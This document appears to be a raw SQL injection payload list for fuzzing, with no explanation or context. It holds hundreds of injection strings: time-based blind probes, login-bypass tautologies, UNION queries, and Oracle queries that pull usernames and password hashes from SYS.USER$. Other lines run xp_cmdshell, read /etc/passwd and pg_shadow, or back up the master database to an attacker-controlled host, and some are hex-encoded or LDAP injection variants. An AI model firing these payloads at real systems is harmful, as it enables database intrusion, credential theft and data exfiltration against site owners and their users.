sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
1) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
1)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
';waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
');waitfor delay '0:0:__TIME__'--
");waitfor delay '0:0:__TIME__'--
));waitfor delay '0:0:__TIME__'--
'));waitfor delay '0:0:__TIME__'--
"));waitfor delay '0:0:__TIME__'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
; --
'; --
'); --
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
' grant connect to name; grant resource to name; --
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
<>"'%;)(&+
|
!
?
/
//
//*
'
' --
(
)
*|
*/*
&
0
031003000270000
0 or 1=1
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
as
asc
a' waitfor delay '0:0:10'--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
delete
desc
distinct
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec(@s)
'; exec ('sel' + 'ect us' + 'er')
exec sp
'; execute immediate 'sel' || 'ect us' || 'er'
exec xp
'; exec xp_regread
' group by userid having 1=1--
handler
having
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
 or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1--
'/**/or/**/1/**/=/**/1
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
 or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
‘ or 3=3 --
' or '7659'='7659
 or a=a
 or a = a
' or 'a'='a
' or a=a--
') or ('a'='a
" or "a"="a
) or (a=a
order by
' or (EXISTS)
 or isNULL(1/0) /*
" or isNULL(1/0) /*
' or 'something' like 'some%'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or 'unusual' = 'unusual'
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' or 'whatever' in ('whatever')
' -- &password=
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
select
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
'sqlvuln
'+sqlvuln
(sqlvuln)
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' union all select @@version--
' union select
uni/**/on sel/**/ect
' UNION SELECT
' union select 1,load_file('/etc/passwd'),1,1,1;
) union select * from information_schema.tables;
' union select * from users where login = char(114,111,111,116);
update
'||UTL_HTTP.REQUEST
,@variable
@variable
@var select @var as var into temp end --
\x27UNION SELECT
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
ý or 1=1 --
select versionnumber, version_timestamp from sysibm.sysversions;
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select current server from sysibm.sysdummy1;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
SELECT schemaname FROM syscat.schemata;
select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
<username>' OR 1=1--
'OR '' = '	Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;
select * from pg_group;
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile;copy myfile to /tmp/test;
)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 waitfor delay '0:0:20' /*
 waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
